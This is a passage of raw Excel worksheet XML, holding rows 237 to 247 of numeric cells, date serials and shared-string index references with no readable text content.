      </c>
      <c r="Q237">
        <v>8</v>
      </c>
      <c r="R237">
        <v>35</v>
      </c>
      <c r="S237">
        <v>7</v>
      </c>
      <c r="T237">
        <v>3</v>
      </c>
      <c r="U237">
        <v>400000</v>
      </c>
      <c r="V237">
        <v>1</v>
      </c>
      <c r="W237">
        <v>5000</v>
      </c>
      <c r="X237">
        <v>0</v>
      </c>
      <c r="Y237">
        <v>0</v>
      </c>
      <c r="Z237">
        <v>2</v>
      </c>
      <c r="AA237">
        <v>1193</v>
      </c>
      <c r="AB237">
        <v>0</v>
      </c>
      <c r="AC237">
        <v>75000</v>
      </c>
      <c r="AD237">
        <v>9139</v>
      </c>
      <c r="AE237">
        <v>225000</v>
      </c>
      <c r="AF237" t="s">
        <v>2025</v>
      </c>
      <c r="AG237">
        <v>95541</v>
      </c>
      <c r="AH237">
        <v>29</v>
      </c>
      <c r="AJ237">
        <v>383</v>
      </c>
      <c r="AK237" t="s">
        <v>2026</v>
      </c>
      <c r="AL237" t="s">
        <v>2027</v>
      </c>
      <c r="AM237" t="s">
        <v>2028</v>
      </c>
      <c r="AN237" t="s">
        <v>82</v>
      </c>
      <c r="AO237">
        <v>2014</v>
      </c>
      <c r="AP237" t="s">
        <v>2029</v>
      </c>
      <c r="AQ237" t="s">
        <v>2030</v>
      </c>
      <c r="AR237" t="s">
        <v>2031</v>
      </c>
      <c r="AS237" t="s">
        <v>71</v>
      </c>
      <c r="AT237" t="s">
        <v>86</v>
      </c>
      <c r="AU237">
        <v>0</v>
      </c>
      <c r="AV237">
        <v>0</v>
      </c>
      <c r="AW237">
        <v>111</v>
      </c>
      <c r="AX237">
        <v>246</v>
      </c>
      <c r="AY237">
        <v>10</v>
      </c>
      <c r="AZ237">
        <v>24</v>
      </c>
      <c r="BA237" t="s">
        <v>17575</v>
      </c>
      <c r="BB237" t="s">
        <v>14614</v>
      </c>
      <c r="BC237" t="s">
        <v>12364</v>
      </c>
      <c r="BD237" t="s">
        <v>12365</v>
      </c>
    </row>
    <row r="238" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A238">
        <v>600</v>
      </c>
      <c r="B238" t="s">
        <v>2032</v>
      </c>
      <c r="C238" t="s">
        <v>157</v>
      </c>
      <c r="D238" t="s">
        <v>2033</v>
      </c>
      <c r="E238" t="s">
        <v>916</v>
      </c>
      <c r="F238" t="s">
        <v>2034</v>
      </c>
      <c r="G238" s="1">
        <v>44363</v>
      </c>
      <c r="H238">
        <v>6775</v>
      </c>
      <c r="I238">
        <v>6775</v>
      </c>
      <c r="J238">
        <v>0</v>
      </c>
      <c r="K238">
        <v>4</v>
      </c>
      <c r="L238">
        <v>0</v>
      </c>
      <c r="M238">
        <v>0</v>
      </c>
      <c r="N238">
        <v>0</v>
      </c>
      <c r="O238">
        <v>0</v>
      </c>
      <c r="P238">
        <v>0</v>
      </c>
      <c r="Q238">
        <v>0</v>
      </c>
      <c r="R238">
        <v>0</v>
      </c>
      <c r="S238">
        <v>0</v>
      </c>
      <c r="T238">
        <v>1</v>
      </c>
      <c r="U238">
        <v>0</v>
      </c>
      <c r="V238">
        <v>40000</v>
      </c>
      <c r="W238">
        <v>0</v>
      </c>
      <c r="X238">
        <v>0</v>
      </c>
      <c r="Y238">
        <v>0</v>
      </c>
      <c r="Z238">
        <v>0</v>
      </c>
      <c r="AA238">
        <v>0</v>
      </c>
      <c r="AB238">
        <v>0</v>
      </c>
      <c r="AC238">
        <v>0</v>
      </c>
      <c r="AD238">
        <v>0</v>
      </c>
      <c r="AE238">
        <v>100</v>
      </c>
      <c r="AF238" t="s">
        <v>2035</v>
      </c>
      <c r="AG238">
        <v>69466</v>
      </c>
      <c r="AH238">
        <v>16</v>
      </c>
      <c r="AJ238">
        <v>256</v>
      </c>
      <c r="AK238" t="s">
        <v>2036</v>
      </c>
      <c r="AL238" t="s">
        <v>2037</v>
      </c>
      <c r="AM238" t="s">
        <v>2038</v>
      </c>
      <c r="AN238" t="s">
        <v>55</v>
      </c>
      <c r="AO238">
        <v>2013</v>
      </c>
      <c r="AP238">
        <v>81231323299</v>
      </c>
      <c r="AQ238" t="s">
        <v>2039</v>
      </c>
      <c r="AR238" t="s">
        <v>2040</v>
      </c>
      <c r="AS238" t="s">
        <v>71</v>
      </c>
      <c r="AT238" t="s">
        <v>58</v>
      </c>
      <c r="AU238">
        <v>25</v>
      </c>
      <c r="AV238">
        <v>1</v>
      </c>
      <c r="AW238">
        <v>19</v>
      </c>
      <c r="AX238">
        <v>149</v>
      </c>
      <c r="AY238">
        <v>3</v>
      </c>
      <c r="AZ238">
        <v>1</v>
      </c>
      <c r="BA238" t="s">
        <v>16644</v>
      </c>
      <c r="BB238" t="s">
        <v>14708</v>
      </c>
      <c r="BC238">
        <v>0</v>
      </c>
      <c r="BD238" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="239" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A239">
        <v>415</v>
      </c>
      <c r="B239" t="s">
        <v>2041</v>
      </c>
      <c r="C239" t="s">
        <v>129</v>
      </c>
      <c r="D239" t="s">
        <v>2042</v>
      </c>
      <c r="E239" t="s">
        <v>111</v>
      </c>
      <c r="F239" t="s">
        <v>2043</v>
      </c>
      <c r="G239" s="1">
        <v>44148</v>
      </c>
      <c r="H239">
        <v>6892</v>
      </c>
      <c r="I239">
        <v>6892</v>
      </c>
      <c r="J239">
        <v>2</v>
      </c>
      <c r="K239">
        <v>1</v>
      </c>
      <c r="L239">
        <v>2</v>
      </c>
      <c r="M239">
        <v>0</v>
      </c>
      <c r="N239">
        <v>0</v>
      </c>
      <c r="O239">
        <v>0</v>
      </c>
      <c r="P239">
        <v>0</v>
      </c>
      <c r="Q239">
        <v>3</v>
      </c>
      <c r="R239">
        <v>0</v>
      </c>
      <c r="S239">
        <v>1</v>
      </c>
      <c r="T239">
        <v>0</v>
      </c>
      <c r="U239">
        <v>15000</v>
      </c>
      <c r="V239">
        <v>1</v>
      </c>
      <c r="W239">
        <v>5000</v>
      </c>
      <c r="X239">
        <v>0</v>
      </c>
      <c r="Y239">
        <v>0</v>
      </c>
      <c r="Z239">
        <v>0</v>
      </c>
      <c r="AA239">
        <v>0</v>
      </c>
      <c r="AB239">
        <v>3000</v>
      </c>
      <c r="AC239">
        <v>0</v>
      </c>
      <c r="AD239">
        <v>1</v>
      </c>
      <c r="AE239">
        <v>0</v>
      </c>
      <c r="AF239" t="s">
        <v>2044</v>
      </c>
      <c r="AG239">
        <v>15710</v>
      </c>
      <c r="AH239">
        <v>11</v>
      </c>
      <c r="AJ239">
        <v>268</v>
      </c>
      <c r="AK239" t="s">
        <v>829</v>
      </c>
      <c r="AL239" t="s">
        <v>2045</v>
      </c>
      <c r="AM239" t="s">
        <v>2046</v>
      </c>
      <c r="AN239" t="s">
        <v>55</v>
      </c>
      <c r="AO239">
        <v>2017</v>
      </c>
      <c r="AP239" t="s">
        <v>2047</v>
      </c>
      <c r="AQ239" t="s">
        <v>2048</v>
      </c>
      <c r="AR239" t="s">
        <v>2049</v>
      </c>
      <c r="AS239" t="s">
        <v>71</v>
      </c>
      <c r="AT239" t="s">
        <v>58</v>
      </c>
      <c r="AU239">
        <v>26</v>
      </c>
      <c r="AV239">
        <v>1</v>
      </c>
      <c r="AW239">
        <v>23</v>
      </c>
      <c r="AX239">
        <v>40</v>
      </c>
      <c r="AY239">
        <v>11</v>
      </c>
      <c r="AZ239">
        <v>5</v>
      </c>
      <c r="BA239" t="s">
        <v>16686</v>
      </c>
      <c r="BB239" t="s">
        <v>14555</v>
      </c>
      <c r="BC239">
        <v>0</v>
      </c>
      <c r="BD239" t="s">
        <v>11722</v>
      </c>
    </row>
    <row r="240" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A240">
        <v>597</v>
      </c>
      <c r="B240" t="s">
        <v>2050</v>
      </c>
      <c r="C240" t="s">
        <v>168</v>
      </c>
      <c r="D240" t="s">
        <v>2051</v>
      </c>
      <c r="E240" t="s">
        <v>76</v>
      </c>
      <c r="F240" t="s">
        <v>2052</v>
      </c>
      <c r="G240" s="1">
        <v>44221</v>
      </c>
      <c r="H240">
        <v>6906</v>
      </c>
      <c r="I240">
        <v>6906</v>
      </c>
      <c r="J240">
        <v>1</v>
      </c>
      <c r="K240">
        <v>0</v>
      </c>
      <c r="L240">
        <v>0</v>
      </c>
      <c r="M240">
        <v>0</v>
      </c>
      <c r="N240">
        <v>0</v>
      </c>
      <c r="O240">
        <v>0</v>
      </c>
      <c r="P240">
        <v>0</v>
      </c>
      <c r="Q240">
        <v>0</v>
      </c>
      <c r="R240">
        <v>0</v>
      </c>
      <c r="S240">
        <v>0</v>
      </c>
      <c r="T240">
        <v>1</v>
      </c>
      <c r="U240">
        <v>1</v>
      </c>
      <c r="V240">
        <v>0</v>
      </c>
      <c r="W240">
        <v>0</v>
      </c>
      <c r="X240">
        <v>0</v>
      </c>
      <c r="Y240">
        <v>0</v>
      </c>
      <c r="Z240">
        <v>0</v>
      </c>
      <c r="AA240">
        <v>0</v>
      </c>
      <c r="AB240">
        <v>0</v>
      </c>
      <c r="AC240">
        <v>0</v>
      </c>
      <c r="AD240">
        <v>0</v>
      </c>
      <c r="AE240">
        <v>1</v>
      </c>
      <c r="AF240" t="s">
        <v>2053</v>
      </c>
      <c r="AG240">
        <v>40194</v>
      </c>
      <c r="AH240">
        <v>13</v>
      </c>
      <c r="AJ240">
        <v>181</v>
      </c>
      <c r="AK240" t="s">
        <v>2054</v>
      </c>
      <c r="AL240" t="s">
        <v>2055</v>
      </c>
      <c r="AM240" t="s">
        <v>2056</v>
      </c>
      <c r="AN240" t="s">
        <v>68</v>
      </c>
      <c r="AO240">
        <v>2012</v>
      </c>
      <c r="AP240">
        <v>81223539399</v>
      </c>
      <c r="AQ240" t="s">
        <v>2057</v>
      </c>
      <c r="AR240" t="s">
        <v>2058</v>
      </c>
      <c r="AS240" t="s">
        <v>71</v>
      </c>
      <c r="AT240" t="s">
        <v>72</v>
      </c>
      <c r="AU240">
        <v>25</v>
      </c>
      <c r="AV240">
        <v>0</v>
      </c>
      <c r="AW240">
        <v>0</v>
      </c>
      <c r="AX240">
        <v>0</v>
      </c>
      <c r="AY240">
        <v>6</v>
      </c>
      <c r="AZ240">
        <v>16</v>
      </c>
      <c r="BA240" t="s">
        <v>17376</v>
      </c>
      <c r="BB240" t="s">
        <v>14706</v>
      </c>
      <c r="BC240" t="s">
        <v>12521</v>
      </c>
      <c r="BD240">
        <v>0</v>
      </c>
    </row>
    <row r="241" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A241">
        <v>551</v>
      </c>
      <c r="B241" t="s">
        <v>2059</v>
      </c>
      <c r="C241" t="s">
        <v>2060</v>
      </c>
      <c r="D241" t="s">
        <v>2061</v>
      </c>
      <c r="E241" t="s">
        <v>843</v>
      </c>
      <c r="F241" t="s">
        <v>1368</v>
      </c>
      <c r="G241" s="1">
        <v>44221</v>
      </c>
      <c r="H241">
        <v>6933</v>
      </c>
      <c r="I241">
        <v>6933</v>
      </c>
      <c r="J241">
        <v>0</v>
      </c>
      <c r="K241">
        <v>0</v>
      </c>
      <c r="L241">
        <v>0</v>
      </c>
      <c r="M241">
        <v>0</v>
      </c>
      <c r="N241">
        <v>0</v>
      </c>
      <c r="O241">
        <v>0</v>
      </c>
      <c r="P241">
        <v>0</v>
      </c>
      <c r="Q241">
        <v>5</v>
      </c>
      <c r="R241">
        <v>1</v>
      </c>
      <c r="S241">
        <v>0</v>
      </c>
      <c r="T241">
        <v>0</v>
      </c>
      <c r="U241">
        <v>0</v>
      </c>
      <c r="V241">
        <v>0</v>
      </c>
      <c r="W241">
        <v>0</v>
      </c>
      <c r="X241">
        <v>0</v>
      </c>
      <c r="Y241">
        <v>0</v>
      </c>
      <c r="Z241">
        <v>0</v>
      </c>
      <c r="AA241">
        <v>0</v>
      </c>
      <c r="AB241">
        <v>1000</v>
      </c>
      <c r="AC241">
        <v>2000</v>
      </c>
      <c r="AD241">
        <v>0</v>
      </c>
      <c r="AE241">
        <v>0</v>
      </c>
      <c r="AF241" t="s">
        <v>2062</v>
      </c>
      <c r="AG241">
        <v>96123</v>
      </c>
      <c r="AH241">
        <v>25</v>
      </c>
      <c r="AJ241">
        <v>441</v>
      </c>
      <c r="AK241" t="s">
        <v>2063</v>
      </c>
      <c r="AL241" t="s">
        <v>2064</v>
      </c>
      <c r="AM241" t="s">
        <v>2065</v>
      </c>
      <c r="AN241" t="s">
        <v>55</v>
      </c>
      <c r="AO241">
        <v>2013</v>
      </c>
      <c r="AP241">
        <v>81356406741</v>
      </c>
      <c r="AQ241" t="s">
        <v>2066</v>
      </c>
      <c r="AR241" t="s">
        <v>2062</v>
      </c>
      <c r="AS241" t="s">
        <v>71</v>
      </c>
      <c r="AT241" t="s">
        <v>58</v>
      </c>
      <c r="AU241">
        <v>21</v>
      </c>
      <c r="AV241">
        <v>0</v>
      </c>
      <c r="AW241">
        <v>7</v>
      </c>
      <c r="AX241">
        <v>3</v>
      </c>
      <c r="AY241">
        <v>13</v>
      </c>
      <c r="AZ241">
        <v>2</v>
      </c>
      <c r="BA241" t="s">
        <v>16717</v>
      </c>
      <c r="BB241" t="s">
        <v>14667</v>
      </c>
      <c r="BC241" t="s">
        <v>10010</v>
      </c>
      <c r="BD241">
        <v>0</v>
      </c>
    </row>
    <row r="242" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A242">
        <v>791</v>
      </c>
      <c r="B242" t="s">
        <v>2067</v>
      </c>
      <c r="C242" t="s">
        <v>74</v>
      </c>
      <c r="D242" t="s">
        <v>2068</v>
      </c>
      <c r="E242" t="s">
        <v>142</v>
      </c>
      <c r="F242" t="s">
        <v>143</v>
      </c>
      <c r="G242" s="1">
        <v>44158</v>
      </c>
      <c r="H242">
        <v>6941</v>
      </c>
      <c r="I242">
        <v>6941</v>
      </c>
      <c r="J242">
        <v>2</v>
      </c>
      <c r="K242">
        <v>1</v>
      </c>
      <c r="L242">
        <v>0</v>
      </c>
      <c r="M242">
        <v>0</v>
      </c>
      <c r="N242">
        <v>0</v>
      </c>
      <c r="O242">
        <v>0</v>
      </c>
      <c r="P242">
        <v>0</v>
      </c>
      <c r="Q242">
        <v>3</v>
      </c>
      <c r="R242">
        <v>0</v>
      </c>
      <c r="S242">
        <v>0</v>
      </c>
      <c r="T242">
        <v>2</v>
      </c>
      <c r="U242">
        <v>200000</v>
      </c>
      <c r="V242">
        <v>10000</v>
      </c>
      <c r="W242">
        <v>0</v>
      </c>
      <c r="X242">
        <v>0</v>
      </c>
      <c r="Y242">
        <v>0</v>
      </c>
      <c r="Z242">
        <v>0</v>
      </c>
      <c r="AA242">
        <v>0</v>
      </c>
      <c r="AB242">
        <v>1000</v>
      </c>
      <c r="AC242">
        <v>0</v>
      </c>
      <c r="AD242">
        <v>0</v>
      </c>
      <c r="AE242">
        <v>2000</v>
      </c>
      <c r="AF242" t="s">
        <v>2069</v>
      </c>
      <c r="AG242">
        <v>51353</v>
      </c>
      <c r="AH242">
        <v>14</v>
      </c>
      <c r="AJ242">
        <v>211</v>
      </c>
      <c r="AK242" t="s">
        <v>2070</v>
      </c>
      <c r="AL242" t="s">
        <v>2071</v>
      </c>
      <c r="AM242" t="s">
        <v>2072</v>
      </c>
      <c r="AN242" t="s">
        <v>55</v>
      </c>
      <c r="AO242">
        <v>2003</v>
      </c>
      <c r="AP242" t="s">
        <v>2073</v>
      </c>
      <c r="AQ242">
        <v>8122567247</v>
      </c>
      <c r="AR242" t="s">
        <v>2074</v>
      </c>
      <c r="AS242" t="s">
        <v>71</v>
      </c>
      <c r="AT242" t="s">
        <v>58</v>
      </c>
      <c r="AU242">
        <v>6</v>
      </c>
      <c r="AV242">
        <v>1</v>
      </c>
      <c r="AW242">
        <v>10</v>
      </c>
      <c r="AX242">
        <v>20</v>
      </c>
      <c r="AY242">
        <v>5</v>
      </c>
      <c r="AZ242">
        <v>2</v>
      </c>
      <c r="BA242" t="s">
        <v>17562</v>
      </c>
      <c r="BB242" t="s">
        <v>14858</v>
      </c>
      <c r="BC242" t="s">
        <v>12319</v>
      </c>
      <c r="BD242">
        <v>0</v>
      </c>
    </row>
    <row r="243" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A243">
        <v>691</v>
      </c>
      <c r="B243" t="s">
        <v>2075</v>
      </c>
      <c r="C243" t="s">
        <v>477</v>
      </c>
      <c r="D243" t="s">
        <v>2076</v>
      </c>
      <c r="E243" t="s">
        <v>300</v>
      </c>
      <c r="F243" t="s">
        <v>899</v>
      </c>
      <c r="G243" s="1">
        <v>44167</v>
      </c>
      <c r="H243">
        <v>7089</v>
      </c>
      <c r="I243">
        <v>7089</v>
      </c>
      <c r="J243">
        <v>1</v>
      </c>
      <c r="K243">
        <v>0</v>
      </c>
      <c r="L243">
        <v>1</v>
      </c>
      <c r="M243">
        <v>0</v>
      </c>
      <c r="N243">
        <v>0</v>
      </c>
      <c r="O243">
        <v>0</v>
      </c>
      <c r="P243">
        <v>0</v>
      </c>
      <c r="Q243">
        <v>0</v>
      </c>
      <c r="R243">
        <v>2</v>
      </c>
      <c r="S243">
        <v>0</v>
      </c>
      <c r="T243">
        <v>1</v>
      </c>
      <c r="U243">
        <v>25000</v>
      </c>
      <c r="V243">
        <v>0</v>
      </c>
      <c r="W243">
        <v>3000</v>
      </c>
      <c r="X243">
        <v>0</v>
      </c>
      <c r="Y243">
        <v>0</v>
      </c>
      <c r="Z243">
        <v>0</v>
      </c>
      <c r="AA243">
        <v>0</v>
      </c>
      <c r="AB243">
        <v>0</v>
      </c>
      <c r="AC243">
        <v>4000</v>
      </c>
      <c r="AD243">
        <v>0</v>
      </c>
      <c r="AE243">
        <v>1000</v>
      </c>
      <c r="AF243" t="s">
        <v>2077</v>
      </c>
      <c r="AG243">
        <v>95256</v>
      </c>
      <c r="AH243">
        <v>29</v>
      </c>
      <c r="AJ243">
        <v>382</v>
      </c>
      <c r="AK243" t="s">
        <v>2078</v>
      </c>
      <c r="AL243" t="s">
        <v>2079</v>
      </c>
      <c r="AM243" t="s">
        <v>2080</v>
      </c>
      <c r="AN243" t="s">
        <v>55</v>
      </c>
      <c r="AO243">
        <v>2014</v>
      </c>
      <c r="AP243">
        <v>0</v>
      </c>
      <c r="AQ243" t="s">
        <v>2081</v>
      </c>
      <c r="AR243" t="s">
        <v>2077</v>
      </c>
      <c r="AU243">
        <v>26</v>
      </c>
      <c r="AV243">
        <v>1</v>
      </c>
      <c r="AW243">
        <v>0</v>
      </c>
      <c r="AX243">
        <v>0</v>
      </c>
      <c r="AY243">
        <v>6</v>
      </c>
      <c r="AZ243">
        <v>2</v>
      </c>
      <c r="BA243" t="s">
        <v>17578</v>
      </c>
      <c r="BB243" t="s">
        <v>14780</v>
      </c>
      <c r="BC243">
        <v>0</v>
      </c>
      <c r="BD243" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="244" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A244">
        <v>736</v>
      </c>
      <c r="B244" t="s">
        <v>2082</v>
      </c>
      <c r="C244" t="s">
        <v>88</v>
      </c>
      <c r="D244" t="s">
        <v>2083</v>
      </c>
      <c r="E244" t="s">
        <v>843</v>
      </c>
      <c r="F244" t="s">
        <v>2084</v>
      </c>
      <c r="G244" s="1">
        <v>44221</v>
      </c>
      <c r="H244">
        <v>7120</v>
      </c>
      <c r="I244">
        <v>7120</v>
      </c>
      <c r="J244">
        <v>0</v>
      </c>
      <c r="K244">
        <v>0</v>
      </c>
      <c r="L244">
        <v>0</v>
      </c>
      <c r="M244">
        <v>0</v>
      </c>
      <c r="N244">
        <v>0</v>
      </c>
      <c r="O244">
        <v>0</v>
      </c>
      <c r="P244">
        <v>0</v>
      </c>
      <c r="Q244">
        <v>3</v>
      </c>
      <c r="R244">
        <v>25</v>
      </c>
      <c r="S244">
        <v>0</v>
      </c>
      <c r="T244">
        <v>0</v>
      </c>
      <c r="U244">
        <v>0</v>
      </c>
      <c r="V244">
        <v>0</v>
      </c>
      <c r="W244">
        <v>0</v>
      </c>
      <c r="X244">
        <v>0</v>
      </c>
      <c r="Y244">
        <v>0</v>
      </c>
      <c r="Z244">
        <v>0</v>
      </c>
      <c r="AA244">
        <v>0</v>
      </c>
      <c r="AB244">
        <v>100</v>
      </c>
      <c r="AC244">
        <v>3000</v>
      </c>
      <c r="AD244">
        <v>0</v>
      </c>
      <c r="AE244">
        <v>0</v>
      </c>
      <c r="AF244" t="s">
        <v>2085</v>
      </c>
      <c r="AG244">
        <v>81155</v>
      </c>
      <c r="AH244">
        <v>17</v>
      </c>
      <c r="AJ244">
        <v>281</v>
      </c>
      <c r="AK244" t="s">
        <v>2086</v>
      </c>
      <c r="AL244" t="s">
        <v>2087</v>
      </c>
      <c r="AM244" t="s">
        <v>2088</v>
      </c>
      <c r="AN244" t="s">
        <v>55</v>
      </c>
      <c r="AO244">
        <v>2016</v>
      </c>
      <c r="AP244">
        <v>81337398989</v>
      </c>
      <c r="AQ244" t="s">
        <v>2089</v>
      </c>
      <c r="AR244" t="s">
        <v>2085</v>
      </c>
      <c r="AS244" t="s">
        <v>71</v>
      </c>
      <c r="AT244" t="s">
        <v>58</v>
      </c>
      <c r="AU244">
        <v>26</v>
      </c>
      <c r="AV244">
        <v>1</v>
      </c>
      <c r="AW244">
        <v>2</v>
      </c>
      <c r="AX244">
        <v>0</v>
      </c>
      <c r="AY244">
        <v>5</v>
      </c>
      <c r="AZ244">
        <v>4</v>
      </c>
      <c r="BA244" t="s">
        <v>17370</v>
      </c>
      <c r="BB244" t="s">
        <v>14813</v>
      </c>
      <c r="BC244">
        <v>0</v>
      </c>
      <c r="BD244" t="s">
        <v>12725</v>
      </c>
    </row>
    <row r="245" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A245">
        <v>19</v>
      </c>
      <c r="B245" t="s">
        <v>735</v>
      </c>
      <c r="C245" t="s">
        <v>1672</v>
      </c>
      <c r="D245" t="s">
        <v>2090</v>
      </c>
      <c r="E245" t="s">
        <v>142</v>
      </c>
      <c r="F245" t="s">
        <v>1420</v>
      </c>
      <c r="G245" s="1">
        <v>44358</v>
      </c>
      <c r="H245">
        <v>7305</v>
      </c>
      <c r="I245">
        <v>7305</v>
      </c>
      <c r="J245">
        <v>4</v>
      </c>
      <c r="K245">
        <v>2</v>
      </c>
      <c r="L245">
        <v>1</v>
      </c>
      <c r="M245">
        <v>5</v>
      </c>
      <c r="N245">
        <v>0</v>
      </c>
      <c r="O245">
        <v>0</v>
      </c>
      <c r="P245">
        <v>0</v>
      </c>
      <c r="Q245">
        <v>15</v>
      </c>
      <c r="R245">
        <v>23</v>
      </c>
      <c r="S245">
        <v>0</v>
      </c>
      <c r="T245">
        <v>0</v>
      </c>
      <c r="U245">
        <v>150000</v>
      </c>
      <c r="V245">
        <v>2000</v>
      </c>
      <c r="W245">
        <v>3000</v>
      </c>
      <c r="X245">
        <v>4000</v>
      </c>
      <c r="Y245">
        <v>0</v>
      </c>
      <c r="Z245">
        <v>0</v>
      </c>
      <c r="AA245">
        <v>0</v>
      </c>
      <c r="AB245">
        <v>6000</v>
      </c>
      <c r="AC245">
        <v>13000</v>
      </c>
      <c r="AD245">
        <v>0</v>
      </c>
      <c r="AE245">
        <v>0</v>
      </c>
      <c r="AF245" t="s">
        <v>2091</v>
      </c>
      <c r="AG245">
        <v>72116</v>
      </c>
      <c r="AH245">
        <v>22</v>
      </c>
      <c r="AJ245">
        <v>344</v>
      </c>
      <c r="AK245" t="s">
        <v>2092</v>
      </c>
      <c r="AL245" t="s">
        <v>2093</v>
      </c>
      <c r="AM245" t="s">
        <v>2094</v>
      </c>
      <c r="AN245" t="s">
        <v>82</v>
      </c>
      <c r="AO245">
        <v>1968</v>
      </c>
      <c r="AP245">
        <v>51821159</v>
      </c>
      <c r="AQ245" t="s">
        <v>2095</v>
      </c>
      <c r="AR245" t="s">
        <v>2096</v>
      </c>
      <c r="AS245" t="s">
        <v>71</v>
      </c>
      <c r="AT245" t="s">
        <v>58</v>
      </c>
      <c r="AU245">
        <v>25</v>
      </c>
      <c r="AV245">
        <v>1</v>
      </c>
      <c r="AW245">
        <v>24</v>
      </c>
      <c r="AX245">
        <v>458</v>
      </c>
      <c r="AY245">
        <v>26</v>
      </c>
      <c r="AZ245">
        <v>29</v>
      </c>
      <c r="BA245" t="s">
        <v>16586</v>
      </c>
      <c r="BB245" t="s">
        <v>14223</v>
      </c>
      <c r="BC245">
        <v>0</v>
      </c>
      <c r="BD245" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="246" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A246">
        <v>34</v>
      </c>
      <c r="B246" t="s">
        <v>2097</v>
      </c>
      <c r="C246" t="s">
        <v>99</v>
      </c>
      <c r="D246" t="s">
        <v>2098</v>
      </c>
      <c r="E246" t="s">
        <v>111</v>
      </c>
      <c r="F246" t="s">
        <v>2099</v>
      </c>
      <c r="G246" s="1">
        <v>44165</v>
      </c>
      <c r="H246">
        <v>7313</v>
      </c>
      <c r="I246">
        <v>7313</v>
      </c>
      <c r="J246">
        <v>1</v>
      </c>
      <c r="K246">
        <v>1</v>
      </c>
      <c r="L246">
        <v>1</v>
      </c>
      <c r="M246">
        <v>0</v>
      </c>
      <c r="N246">
        <v>0</v>
      </c>
      <c r="O246">
        <v>0</v>
      </c>
      <c r="P246">
        <v>0</v>
      </c>
      <c r="Q246">
        <v>0</v>
      </c>
      <c r="R246">
        <v>2</v>
      </c>
      <c r="S246">
        <v>0</v>
      </c>
      <c r="T246">
        <v>1</v>
      </c>
      <c r="U246">
        <v>150000</v>
      </c>
      <c r="V246">
        <v>1</v>
      </c>
      <c r="W246">
        <v>4000</v>
      </c>
      <c r="X246">
        <v>0</v>
      </c>
      <c r="Y246">
        <v>0</v>
      </c>
      <c r="Z246">
        <v>0</v>
      </c>
      <c r="AA246">
        <v>0</v>
      </c>
      <c r="AB246">
        <v>0</v>
      </c>
      <c r="AC246">
        <v>8000</v>
      </c>
      <c r="AD246">
        <v>0</v>
      </c>
      <c r="AE246">
        <v>50000</v>
      </c>
      <c r="AF246" t="s">
        <v>2100</v>
      </c>
      <c r="AG246">
        <v>14440</v>
      </c>
      <c r="AH246">
        <v>12</v>
      </c>
      <c r="AJ246">
        <v>160</v>
      </c>
      <c r="AK246" t="s">
        <v>396</v>
      </c>
      <c r="AL246" t="s">
        <v>396</v>
      </c>
      <c r="AN246" t="s">
        <v>55</v>
      </c>
      <c r="AO246">
        <v>2003</v>
      </c>
      <c r="AP246" t="s">
        <v>2101</v>
      </c>
      <c r="AQ246" t="s">
        <v>2102</v>
      </c>
      <c r="AR246" t="s">
        <v>2100</v>
      </c>
      <c r="AS246" t="s">
        <v>71</v>
      </c>
      <c r="AT246" t="s">
        <v>58</v>
      </c>
      <c r="AU246">
        <v>25</v>
      </c>
      <c r="AV246">
        <v>0</v>
      </c>
      <c r="AW246">
        <v>5</v>
      </c>
      <c r="AX246">
        <v>7</v>
      </c>
      <c r="AY246">
        <v>4</v>
      </c>
      <c r="AZ246">
        <v>4</v>
      </c>
      <c r="BA246" t="s">
        <v>17557</v>
      </c>
      <c r="BB246" t="s">
        <v>14238</v>
      </c>
      <c r="BC246">
        <v>0</v>
      </c>
      <c r="BD246" t="s">
        <v>12481</v>
      </c>
    </row>
    <row r="247" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A247">
        <v>678</v>
      </c>
      <c r="B247" t="s">
        <v>2103</v>
      </c>
      <c r="C247" t="s">
        <v>88</v>
      </c>
      <c r="D247" t="s">
        <v>2104</v>
      </c>
      <c r="E247" t="s">
        <v>944</v>
      </c>
      <c r="F247" t="s">
        <v>2105</v>
      </c>
      <c r="G247" s="1">
        <v>44181</v>
      </c>
      <c r="H247">
        <v>7391</v>
      </c>
      <c r="I247">
        <v>7391</v>
      </c>
      <c r="J247">
        <v>0</v>
      </c>
      <c r="K247">
        <v>0</v>
      </c>
      <c r="L247">
        <v>0</v>
      </c>
      <c r="M247">
        <v>0</v>
      </c>
      <c r="N247">
        <v>0</v>
      </c>
      <c r="O247">
        <v>0</v>
      </c>
      <c r="P247">
        <v>3</v>
      </c>
      <c r="Q247">
        <v>2</v>
      </c>
      <c r="R247">
        <v>6</v>
      </c>
      <c r="S247">
        <v>8</v>
      </c>
      <c r="T247">
        <v>1</v>
      </c>
      <c r="U247">
        <v>0</v>
      </c>
      <c r="V247">
        <v>0</v>
      </c>
      <c r="W247">
        <v>0</v>
      </c>
      <c r="X247">
        <v>0</v>
      </c>
      <c r="Y247">
        <v>0</v>
      </c>
      <c r="Z247">
        <v>0</v>
      </c>
      <c r="AA247">
        <v>25000</v>
      </c>
      <c r="AB247">
        <v>4000</v>
      </c>
      <c r="AC247">
        <v>15000</v>
      </c>
      <c r="AD247">
        <v>25000</v>
      </c>
      <c r="AE247">
        <v>200000</v>
      </c>
      <c r="AF247" t="s">
        <v>2106</v>
      </c>
      <c r="AG247">
        <v>82251</v>
      </c>
      <c r="AH247">
        <v>17</v>
      </c>
      <c r="AJ247">
        <v>274</v>
      </c>
      <c r="AK247" t="s">
        <v>1058</v>
      </c>
      <c r="AL247" t="s">
        <v>2107</v>
      </c>
      <c r="AM247" t="s">
        <v>2108</v>
      </c>
      <c r="AN247" t="s">
        <v>55</v>
      </c>
      <c r="AO247">
        <v>1977</v>
      </c>
      <c r="AP247" t="s">
        <v>2109</v>
      </c>
      <c r="AQ247" t="s">
        <v>2110</v>
      </c>
      <c r="AR247" t="s">
        <v>2111</v>
      </c>
      <c r="AS247" t="s">
        <v>71</v>
      </c>
      <c r="AT247" t="s">
        <v>58</v>
      </c>
      <c r="AU247">
        <v>45</v>
      </c>
